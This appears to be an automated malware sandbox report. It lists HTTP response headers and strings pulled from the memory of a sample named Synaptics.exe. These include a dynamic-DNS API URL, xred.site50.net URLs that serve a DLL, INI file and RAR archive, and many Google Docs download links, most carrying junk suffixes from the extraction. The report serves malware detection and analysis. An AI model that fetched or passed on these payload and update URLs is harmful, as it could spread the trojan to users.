                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6cEp6pFPNl5Xa7sbX8jQxMNVDdyuC69z5W4yvVkqeGgtUDzo61WRggM6v2LE6QA2WJ12ccfLgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 07 Jan 2025 12:18:34 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-S35fU7U-5pXkSAM-iMVRkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6F5WUlqGPCruTCsSnHqN7pRQmYRRKqHFApds3eZOlrduui5CHpVseprB0EFMJGzi46Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 07 Jan 2025 12:18:36 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ZvOTkauHlWm1dBpuMdT5Cg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5AFEGbacIzpSAULCoPQkw8rQlP8j00jsK0afAf7paQz2DH7_4vaUPD3x2y83op_4BPContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 07 Jan 2025 12:18:36 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-JnKr9rVpi7N8UzYKecQyFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6fjW79sMfd1HlUfT-MEXFhe4qPQ27GWsVwFOoxyb5FqGrulKmtpHxCkk2oCpEg4dMF5DRsOmMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 07 Jan 2025 12:18:37 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-Ct9D7YgvO5V7GKRak1rSAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7jhPuA0J95js8FDmgC7duCyXj-lWiC5Ip5lkvfsF-1xpoMkD_qoKNHuBipEvY4hPp3Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 07 Jan 2025 12:18:37 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-uzHOJLaF6rlpMxcTIFlrSg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: ~$cache1.3.dr String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc6135629783
Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978=
Source: Amcache.hve.14.dr String found in binary or memory: http://upx.sf.net
Source: Synaptics.exe, 00000003.00000002.1579357686.00000000078E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: ~$cache1.3.dr String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
Source: Synaptics.exe, 00000003.00000002.1574683865.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
Source: 1.exe, 00000001.00000003.1317389271.0000000002210000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlp
Source: ~$cache1.3.dr String found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
Source: 1.exe, 00000001.00000003.1317389271.0000000002210000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniH)
Source: Synaptics.exe, 00000003.00000002.1574683865.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
Source: ~$cache1.3.dr String found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
Source: Synaptics.exe, 00000003.00000002.1574683865.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
Source: Synaptics.exe, 00000003.00000002.1578664334.00000000077F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.goo
Source: Synaptics.exe, 00000003.00000003.1435345190.0000000000824000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1430792248.0000000005406000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1579357686.00000000078D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/
Source: ~$cache1.3.dr String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                              Source: Synaptics.exe, 00000003.00000002.1579357686.0000000007871000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1581174232.00000000084BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1584993099.000000000D4BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1581398418.00000000089BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1581615249.0000000008EBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1582937666.000000000A8FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1582242501.0000000009C7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1583276302.000000000B07E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1584701542.000000000CE7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1581733226.000000000913E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1584819657.000000000D0FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1583163277.000000000ADFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576171771.000000000525E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1430792248.000000000544C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1575669367.0000000004ADE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1585107280.000000000D73E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1581967941.000000000963E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1580833395.0000000007D3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.000000000542F000.00000004.00000020.00020000.00000000.sdmp, 
Synaptics.exe, 00000003.00000002.1584103128.000000000C1FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1583513029.000000000B57E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTE
                              Source: Synaptics.exe, 00000003.00000002.1576257579.0000000005492000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTu
                              Source: Synaptics.exe, 00000003.00000002.1576257579.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTu:
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTx?
                              Source: Synaptics.exe, 00000003.00000003.1430792248.0000000005444000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1578664334.00000000077B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUS1
                              Source: Synaptics.exe, 00000003.00000002.1576257579.0000000005492000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX%
                              Source: Synaptics.exe, 00000003.00000002.1576257579.0000000005439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXl
                              Source: Synaptics.exe, 00000003.00000002.1578664334.00000000077B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYx$
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_XT
                              Source: Synaptics.exe, 00000003.00000002.1576257579.0000000005492000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadadmob
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadag
                              Source: Synaptics.exe, 00000003.00000002.1576257579.0000000005492000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadan
                              Source: Synaptics.exe, 00000003.00000003.1430792248.000000000544C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.0000000005439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadartse
                              Source: Synaptics.exe, 00000003.00000003.1430792248.0000000005406000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadate
                              Source: Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.0000000000815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadce
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadck
                              Source: Synaptics.exe, 00000003.00000003.1430792248.0000000005406000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadclos
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.c
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.ne(
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.nen
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadco
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom.a
                              Source: Synaptics.exe, 00000003.00000002.1579357686.0000000007871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcr
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadct.net.cn
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.0000000000815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd-typ
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.0000000000815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd:#f
                              Source: Synaptics.exe, 00000003.00000003.1430792248.000000000544C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.0000000005439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddbox-~e
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddica
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddir=l
                              Source: Synaptics.exe, 00000003.00000002.1576257579.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddnX
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.0000000000815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddoApuh
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                              Source: Synaptics.exe, 00000003.00000002.1578664334.00000000077B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.&
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.cn
                              Source: Synaptics.exe, 00000003.00000003.1430792248.0000000005444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadecnapps.cn
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadedp%
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloader
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaderco
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaderflo
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
                              Source: Synaptics.exe, 00000003.00000002.1576257579.000000000542F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1430792248.000000000542F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg.$
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgoog
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgth:
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgvt2V
                              Source: Synaptics.exe, 00000003.00000003.1430792248.000000000542F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh-ua
                              Source: Synaptics.exe, 00000003.00000002.1576257579.0000000005492000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhe
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadid.go
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.0000000000815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadinfo.
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.0000000000815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadir=l
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiveUn
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
